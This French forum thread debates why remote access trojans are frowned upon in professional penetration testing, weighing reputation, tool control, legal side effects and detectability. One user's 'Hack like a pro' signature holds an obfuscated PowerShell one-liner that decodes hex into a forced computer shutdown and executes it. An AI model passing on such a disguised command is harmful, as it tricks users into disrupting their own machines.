Annonce

Réduire
Aucune annonce.

Votre avi sur les RAT

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Votre avi sur les RAT

    Bonjour à vous

    J'ai croisé un certain nombre de pentester et lorsque viens le sujet des RAT j'entends grincer des dents.
    Ces derniers on (visiblement) mauvaise réputation dans le milieu de la sécurité offensive professionnel. Pourtant, c'est bien souvent un outil puissant et simple d'utilisation.

    Je me demande alors: Pourquoi les RAT on mauvaise réputation?

    Ils sont dans la casi totalité des cas associés au piratage. Mais concrètement, pourquoi ne pas en utiliser dans des tests d'intrusions en milieu pro?
    Si on prend un outil comme meterpreter, largement utilisé pour des pentests, il rassemble les même fonctionnalités et le principe est le même que pour les RAT. Pourtant, je n'ai jamais entendu personne dire "Non, il ne faut pas utiliser meterpreter!".

    Est-ce pour des raisons de bypass d'AV? Cela me parais quant même étonnant sachant qu'une fois (correctement) crypter les binaires deviennent difficilement détectables quelque soit leur "origine".

    Si vous avez des informations là-dessus je suis preneur

    A bientôt

  • #2
    Hello,

    Mon avis sur les RAT c'est qu'on en a vu beaucoup trop apparaître, qui se ressemble tous, et qu'ils sont majoritairement "mal" utilisés par les débutants qui considèrent ça comme un outil magique pour commencer dans le milieu (surtout pour impressioner).

    Du coup, c'est un peu "Les RATs, c'est pour les amateurs, c'est les script kiddies qui utilisent mal ça" alors que les tools qu'on peut trouver sur Kali typiquement c'est "Ok s'il sait utiliser un Kali et qu'il utilise meterpreter, le gars sait ce qu'il fait" et comme c'est un bon outil utilisé par beaucoup de monde notamment des "pros", il n'est pas diaboliser comme un darkcomet ou autres.

    Commentaire


    • #3
      Envoyé par bambish Voir le message
      Je me demande alors: Pourquoi les RAT on mauvaise réputation?
      Pour moi, c'est surtout une question de biais cognitifs habituels, autrement: mi, moi, me, mu... soit de l'égocentrisme intellectuel. Aucun milieu n'est épargné par ça, les normes sociales et les évaluations qui y sont liées. Bref, je ne vais pas faire un cours de psycho.

      Pour ma part, donc non expert en sécurité informatique (Je suis psychologue social de formation, non sans dec... Voilà qui est fait pour cette précision dont je me passe habituellement, ceci dit, elle restera cachée au beau milieu de mon tas de messages) : la normativité et la moraline, c'est bon pour... comment dire... pour ceux qui n'ont pas de pot !

      Pour ma part donc, je suis très, mais alors très très fan des outils des gouvernements conçus pour l'espionnage ou la cyberguerre. Donc forcément, les RAT ou les rootkits y sont au beau milieu. J'ai épluché dans la mesure de ce que j'ai pu avoir entre les mains, les fuites issues de Snowden, Wikileaks et les Shadowbrokers. Ca, je suis désolé, mais c'est absolument passionnant. La puissance et l'ingéniosité de ces outils (je ne vous présente pas stuxnet, ou greyfish), les enjeux géostratégiques de l'ensemble, c'est juste fascinant. Ca vaut plusieurs bons romans policiers et cours de sécurité informatique !

      Pour moi, le milieu des hackers ne m'intéresse a priori pas beaucoup, beaucoup d'ego et pas beaucoup de grandeur, et celui des backhats encore moins. En revanche, l'espionnage gouvernementale ou la cyberguerre, c'est absolument énorme. Et je crois, je ne suis pas sûr mais le doute m'éfleure, que dans les agences genre FBI, CIA, NSA, MI5 et 6, DGSE et DGSI, etc, ils ne s'encombrent pas trop de moraline concernant les RATs... ce qui compte, c'est l'adéquation moyens/objectifs. Et à partir de là, ils arrivent à des prouesses technologiques qui imposent juste l'admiration, quoi que l'on pense des abus de ces organisations (on peut discuter le bout de gras autour d'un 51 et d'une paire d'olives sur la surveillance globale de la NSA, n'empêche que leurs outils sont juste à tomber par terre).

      Mon humble avis.

      Commentaire


      • #4
        Envoyé par acloseone Voir le message

        Pour moi, (...)

        Pour ma part, (...)

        Pour ma part donc, (...)

        Pour moi, (...)

        Mon humble avis.
        Il dirait quoi en lisant ça, un psychologue social ? :P Désolé je taquine, j'abonde dans le sens de ton "humble avis".

        Sinon pour ce que j'en pense :
        1/
        Déjà, y'a une question de vocabulaire.
        Dans l’inconscient collectif, RAT = script kiddie. Ca fait référence à un tool "packagé / clef en main"
        Inversement, et même si un simple script PS qui monte un reverse shell est à considérer comme un RAT, le fait de d'utiliser un outil qui tu maitrises parfaitement (car opensource a minima) fait "pro".

        2/
        Utiliser un RAT commercial / packagé (closed source) dans le cadre d'un pentest, c'est un truc pas acceptable car tu maîtrise pas les effets de bords que tu imposes au client de l'audit. (genre si le tool monte un autre tunnel caché qui balance des trucs en chine t'as intérêt à avoir un avocat qui soit moins con que toi).

        3/
        A coté de tout ça, il y a - en plus - une question purement pratique et contractuelle qui remet en cause l'utilité même de la démarche : il est très rare de pouvoir pousser un pentest (hors redteam) jusqu'a l'envoi d'une charge malveillante à un utilisateur "final" non prévenu.
        Et si il est prévenu, peu d’intérêt : tu tests juste l'efficacité de l'AV et ça, pas besoin de payer un pentest à 5k pour le faire.
        Hack like a pro :
        PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

        Commentaire


        • #5
          Envoyé par Krisscool Voir le message

          Il dirait quoi en lisant ça, un psychologue social ? :P Désolé je taquine, j'abonde dans le sens de ton "humble avis".
          Que personne n'a pas d'ego, et que chacun doit faire avec ce fardeau (même si ça n'est pas que ça)...

          Commentaire


          • #6
            Mon avis est pas positif en ce qui me concerne surtout par rapport à la manière... Il est diffusé afin de faire croire à son utilité, alors que son objectif est nuisible.

            Ca a le côté vicieux de rendre la victime (sans réelle connaissance) plus bête qu'elle ne l'est en acceptant d'exécuter un programme dont elle croît son bon fondement. Donc vouloir prendre les gens pour des cons démontrent déjà la stupidité du créateur.

            Les gens n'aimant pas ce style de mentalité, il n'est pas étonnant que les RAT aient mauvaises réputations.

            Commentaire


            • #7
              A vrai dire, c'est surtout pour des raisons techniques... Un rat c'est cramé à 10000km, c'est gros, c'est lourd, c'est pas concis, ça s'adapte pas à toutes les situations, tu as pas la main sur tout, tu ne peux pas profiter de l'environnement qui t'entoure, tu ne peux pas moduler à ta sauce, effectuer les actions comme tu veux qu'elle soit effectuées... En bref, t'es pas discret, efficace et concis alors qu'avec les mimines, tu fais ce que tu veux comme tu veux... Les RAT c'est cool pour s'amuser quand tu découvres et fais quelques sous d'adolescent... Mais ça n'a rien avoir avec les hacking, passes vite à autre chose pour progresser & pas perdre de temps !

              Commentaire

              Chargement...
              X